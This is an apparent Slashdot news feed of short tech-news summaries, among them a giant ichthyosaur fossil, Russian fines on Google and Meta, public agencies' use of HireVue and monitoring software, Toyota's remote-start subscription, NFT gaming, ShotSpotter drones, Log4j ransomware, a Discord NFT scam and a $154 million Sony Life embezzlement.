Large Ocean Fossil Discovered in Nevada Could Hold Key To Aquatic Evolution

An 8-foot-long skull discovered in the Augusta Mountains of Nevada is the largest fossil ever found from its time. The research team believes that the remarkable discovery could provide insight into how modern whales developed, and how to preserve their presence in our oceans. From a report: The fossil — a newly discovered species of ichthyosaur, a type of large aquatic reptile — dates to about 246 million years ago. The newly-named cymbospondylus youngorum is, according to the research team, the largest animal found from that time period, both in the sea and on land. It currently holds the title of the first giant animal to ever inhabit Earth. The well-preserved skull was excavated along with part of the creature’s backbone, shoulder and forefin. At more than 55 feet long, the ichthyosaur was estimated to be the size of a large sperm whale, according to the study released Thursday by the American Association for the Advancement of Science and the Natural History Museums of Los Angeles County. The ichthyosaur has an elongated snout and conical teeth, leading researchers to believe it ate squid and fish. It also could have hunted smaller marine reptiles and younger members of its species.

Read more of this story at Slashdot.

Russia Steps Up Pressure on Google, Meta With Record Fines

A Russian court fined Alphabet’s Google 7.2 billion rubles ($98 million) and Meta Platforms 2 billion rubles Friday for failing to remove banned content, the largest such penalties yet, as the authorities escalate a crackdown on foreign technology companies. From a report: The fines were due to the companies’ repeated failure to comply with orders to take down content and based on a percentage of their annual earnings in Russia, the federal communications watchdog said in a statement. Google and Meta could face more fines if they don’t remove the material, it said.

Google is studying the ruling and then will determine its next steps, the company’s press service in Moscow said in a statement. Russia has stepped up its confrontation with foreign social media and internet companies this year in what the government calls a campaign to uphold its digital sovereignty. Regulators have levied fines and slowed content in a bid to force companies including Google and Twitter to delete posts encouraging unauthorized protests and other material deemed illegal.

Read more of this story at Slashdot.

Centralized Crypto Exchanges Saw Over $14 Trillion in Trading Volume this Year

Public Agencies Are Buying Up AI-Driven Hiring Tools and ‘Bossware’

Through public records requests, The Markup found more than 20 public agencies using the sometimes-controversial software. From the report: In 2020, the FDA’s Center for Drug Evaluation and Research (CDER) faced a daunting task: It needed to fill more than 900 job vacancies — and fast. The center, which does things like inspect pharmaceutical manufacturing facilities, was in the process of modernizing the FDA’s New Drugs Regulatory Program just as the pandemic started. It faced “a surge in work,” along with new constraints that have affected everyone during the pandemic, including travel limitations and lockdowns. So they decided to turn to an artificial intelligence tool to speed up the hiring, according to records obtained by The Markup. The center, along with the Office of Management and the Division of Management Services, the background section of a statement of work said, were developing a “recruitment plan to leverage artificial intelligence (AI) to assist in the time to hire process.”

The agency ultimately chose to use HireVue, an online platform that allows employers to review asynchronously recorded video interviews and have recruits play video games as part of their application process. Over the years the platform has also offered a variety of AI features to automatically score candidates. HireVue, controversially, used to offer facial analysis to predict whether an applicant would be a good fit for an open job. In recent years, research has shown that facial recognition software is racially biased. In 2019, the company’s continued use of the technique led one member of its scientific advisory board to resign. It has since stopped using facial recognition. The Markup used GovSpend, a database of procurement records for U.S. agencies at the state, local, and federal levels, to identify agencies that use HireVue. We also searched for agencies using Teramind and ActivTrak, both another kind of controversial software that allows employers to remotely monitor their workers’ browsing activities through screenshots and logs. The Markup contacted and filed public records requests with those 24 agencies to understand how they were using the software. Eleven public agencies, including the FDA, replied to The Markup with documents or confirmations that they had bought HireVue at some point since 2017. Of the six public agencies that replied to The Markup’s questions confirming that they actually used the software, all but one — Lake Travis Independent School District in Texas — confirmed they did not make use of the AI scoring features of the software. Documents and responses from 13 agencies confirmed that they purchased Teramind or ActivTrak at some point during the same time frame.

Read more of this story at Slashdot.

Toyota ‘Reviewing’ Key Fob Remote Start Subscription Plan After Massive Blowback

An anonymous reader shares a report: Earlier this month, we broke a story about Toyota locking its key fob remote start function behind a monthly subscription. If owners of certain models aren’t actively enrolled in a larger Toyota connected services plan, the proximity remote start function on the fob — that is, when you press the lock button three times to start the car while outside of it — will not work even though it sends the signal directly to the car. Obviously, this sent people into a frenzy whether they own a Toyota or not, because it was seen as a dark harbinger of the perils of fully-connected cars. Automakers now have the ability to nickel and dime people to death by charging ongoing subscription fees for functions that used to be a one-and-done purchase, and it looked like Toyota was hopping on the bandwagon.

At the time, Toyota declined to give us a detailed answer on why it chose to take a feature that doesn’t need an internet connection to function and moved it behind a paywall. Today, we’ve got answers. Toyota now claims it never intended to market the key fob remote start as a real feature, and it also says the subscription requirement was an inadvertent result of a relatively small technical decision related to the way its new vehicles are architectured. Finally, Toyota has heard the outrage over the last week — a spokesperson told us the company was caught off guard by the blowback — and its executive team is currently examining whether it’s possible to reverse course and drop the subscription requirement for key fob remote start.

Read more of this story at Slashdot.

Virtual Guns in Videogames Could Soon Be Worth Real Money

Game makers are increasingly selling virtual weapons and gear as NFTs, extending the trendy digital deeds’ reach but rankling some players. From a report: More videogame makers are selling virtual guns, helmets and other gear in the form of NFTs, a move that is increasingly pushing the trendy digital deeds into the average household. Players have been paying for virtual goods in games like “Grand Theft Auto Online” and “World of Warcraft” for years, but turning those items into nonfungible tokens would let gamers trade and resell them, making them into potentially valuable assets. The change also could mean that players who buy an NFT in one game could use it later in other games, on social media and in other corners of the internet — an important step in developing an economy for the so-called metaverse. “FarmVille” maker Zynga and “Assassin’s Creed” creator Ubisoft Entertainment are among the first big, publicly traded gaming companies to say they are experimenting with the strategy. Electronic Arts, Playtika and others are also looking into NFTs’ potential use for engaging players.

“We’re doing this because this may be part of the future of gaming,” said Matt Wolf, Zynga’s new vice president of blockchain gaming. “This is all about community building.” Nonfungible tokens are essentially digital deeds that verify the authenticity of the items they represent as unique. They are the latest internet-based collecting craze, and so far they have come in forms ranging from digital artwork and trading cards to virtual real estate and sneakers, as well as concert tickets and even sports highlights. The tokens are stored on a blockchain, a digital ledger that shows when they were purchased and for how much, and ensures NFTs can’t be duplicated or changed. Amid all that activity, NFTs’ advent in videogames holds particular significance because gamers spend so much time in virtual worlds. That makes them potential early adopters in the metaverse — a virtual realm where proponents say people will work, play and shop and where technology experts say the ability to buy and sell NFTs will be key.

Read more of this story at Slashdot.

New Policing System Will Send Drones To the Source of Gunshots

A new policing system is being developed that will send autonomous drones equipped with shot-locating technology to the source of gunshots. “By analyzing the live video from its onboard camera, police officers can then gain a better sense of the situation they’re heading into,” reports New Atlas. From the report: Already in use in over 120 cities in the US, South Africa and the Caribbean, the American ShotSpotter system utilizes a network of microphones within a neighborhood to detect “loud, impulsive sounds.” Whenever such a sound is detected, its geographical originating point can be triangulated by analyzing the millisecond differences in the times at which it was picked up by the different microphones — the closer a mic was to the gun, the earlier it will have detected the sound of that gun firing. That said, a combination of AI software and human staff (at a control center) is used to determine if the sound is indeed gunfire.

In the existing version of the system, police are quickly dispatched to the location. If they’re using ground transportation, however, it may take a while for them to get there. And even if the police department has a helicopter, performing pre-flight checks, etc will still take some time — assuming the aircraft isn’t already in the air on patrol, that is. With these potential limitations in mind, Israeli drone manufacturer Airobotics has teamed up with ShotSpotter to add autonomous drones to the mix. In the new version of the setup, police will still be dispatched, but so will the closest system-specific drone. That aircraft will be in the air within seconds, immediately flying to the source of the gunshots. By analyzing the live video from its onboard camera, police officers can then gain a better sense of the situation they’re heading into.

Read more of this story at Slashdot.

Second Ransomware Family Exploiting Log4j Spotted In US, Europe

Researchers say a second family of ransomware has been growing in usage for attack attempts that exploit the critical vulnerability in Apache Log4j, including in the U.S. and Europe. VentureBeat reports: A number of researchers, including at cybersecurity giant Sophos, have now said they’ve observed the attempted deployment of a ransomware family known as TellYouThePass. Researchers have described TellYouThePass as an older and largely inactive ransomware family — which has been revived following the discovery of the vulnerability in the widely used Log4j logging software. TellYouThePass is the second family of ransomware that’s been observed to exploit the vulnerability in Log4j, known as Log4Shell, joining the Khonsari ransomware, according to researchers.

While previous reports indicated that TellYouThePass was mainly being directed against targets in China, researchers at Sophos told VentureBeat that they’ve observed the attempted delivery of TellYouThePass ransomware both inside and outside of China — including in the U.S. and Europe. “Systems in China were targeted, as well as some hosted in Amazon and Google cloud services in the U.S. and at several sites in Europe,” said Sean Gallagher, a senior threat researcher at Sophos Labs, in an email to VentureBeat on Tuesday. Sophos detected attempts to deliver TellYouThePass payloads by utilizing the Log4j vulnerability on December 17 and December 18, Gallagher said. TellYouThePass has versions that run on either Linux or Windows, “and has a history of exploiting high-profile vulnerabilities like EternalBlue,” said Andrew Brandt, a threat researcher at Sophos, in an email. The Linux version is capable of stealing Secure Socket Shell (SSH) keys and can perform lateral movement, Brandt said. Sophos initially disclosed its detection of TellYouThePass ransomware in a December 20 blog post.

The first report of TellYouThePass ransomware exploiting the Log4j vulnerability appears to have come from the head of Chinese cybersecurity group KnownSec 404 Team on December 12. The attempted deployment of TellYouThePass in conjunction with Log4Shell was subsequently confirmed by additional researchers, according to researcher community Curated Intelligence. In a blog post Tuesday, Curated Intelligence said its members can now confirm that TellYouThePass has been seen exploiting the vulnerability “in the wild to target both Windows and Linux systems.” TellYouThePass had most recently been observed in July 2020, Curated Intelligence said. It joins Khonsari, a new family of ransomware identified in connection with exploits of the Log4j vulnerability.

Read more of this story at Slashdot.

Twitch Co-Founder Gets Discord Hacked, $150,000 Stolen From Users In NFT Scam

Luke Plunkett writes via Kotaku: Justin Kan, a co-founder of Twitch and the dude Justin.TV was named for, last week decided to launch a site called Fractal. It was to be a ‘marketplace’ where in-game items could be bought and sold as NFTs. Later, in Fractal’s Discord server, a link appeared advertising a drop of 3,333 NFTs. You may have guessed what happened next. As Twitch reporter Zach Bussey has detailed, the message, which appeared legit since it was coming from inside the house, had actually been posted by someone gaining access to Fractal’s Discord bot, pointing towards ‘Fractai’, not Fractal. The scammers managed to “sell” 3,294 NFTs before the plug was pulled. There were of course no actual NFTs being sold at all, just money being straight up stolen — over $150,000 — though you’d be forgiven for wondering what the difference is.

In response, the Fractal team issued a statement acknowledging the breach, along with a promise they are “going to make this right.” […] ractal say they are “planning to fully compensate these 373 victims,” before adding the extraordinary warning, “We must use our best judgement as there’s no ‘undo button’ in crypto,” making the entire post read like a textbook example of showcasing why this is such a shitty space. Meanwhile, Kan issued a short video statement of his own, alongside warnings that this Discord scam had been perpetrated on other NFT communities as well.

Read more of this story at Slashdot.

US Returns $154 Million In Bitcoins Stolen By Sony Employee

The United States has taken legal action to seize and return over $154 million purportedly stolen from Sony Life Insurance Company Ltd, a SONY subsidiary, by an employee in a textbook business email compromise (BEC) attack. BleepingComputer reports: “According to the government’s complaint, Rei Ishii, an employee of Sony Life Insurance Company Ltd. (“Sony Life”) in Tokyo, allegedly diverted the $154 million when the company attempted to transfer funds between its financial accounts,” the Justice Dept said today. “Ishii allegedly did this by falsifying transaction instructions, which caused the funds to be transferred to an account that Ishii controlled at a bank in La Jolla, California.”

According to court documents, Ishii switched the transfer address for a Sony Life transaction to use a Silvergate Bank account under his control. Ishii later converted the stolen funds into more than 3879 bitcoins via A Coinbase set up to automatically transfer all added funds to an offline cryptocurrency cold wallet […]. After converting the money to cryptocurrency, Ishii also tried persuading his supervisor and several Sony Life executives not to help investigators by emailing them a ransom note typed in English and Japanese. “If you accept the settlement, we will return the funds back. If you are going to file criminal charges, it will be impossible to recover the funds,” the note read. “We might go down behind all of this, but one thing is for sure, you are going to be right there next to us. We strongly recommend to stop communicate (sic) with any third parties including law enforcement.”

However, on December 1, following an investigation in collaboration with Japanese law enforcement authorities, the FBI seized the 3879.16242937 BTC in Ishii’s wallet after obtaining the private key, which made it possible to transfer all the bitcoins to the FBI’s bitcoin wallet. […] Tokyo’s Metropolitan Police Department arrested the 32-year-old Ishii the same day and criminally charged him on suspicion of obtaining $154 million dollars following fraudulent money transfers from mid-May.

Read more of this story at Slashdot.